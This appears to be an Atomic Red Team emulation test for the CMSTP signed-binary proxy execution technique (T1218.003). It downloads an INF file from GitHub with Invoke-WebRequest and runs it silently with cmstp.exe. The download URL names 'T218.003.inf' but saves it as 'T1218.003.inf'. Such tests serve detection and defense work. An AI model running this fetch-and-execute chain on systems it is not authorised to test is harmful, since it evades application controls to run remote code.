#TechniqueName: Signed Binary Proxy Execution: CMSTP
#AtomicTestName: CMSTP Executing Remote Scriptlet
#Language: cmd

#get_prereq_commands
New-Item -Type Directory (split-path PathToAtomicsFolder\T1218.003\src\T1218.003.inf) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.003/src/T218.003.inf" -OutFile "PathToAtomicsFolder\T1218.003\src\T1218.003.inf"


#prereq_commands
if (Test-Path PathToAtomicsFolder\T1218.003\src\T1218.003.inf) {exit 0} else {exit 1}


#commands
cmstp.exe /s PathToAtomicsFolder\T1218.003\src\T1218.003.inf

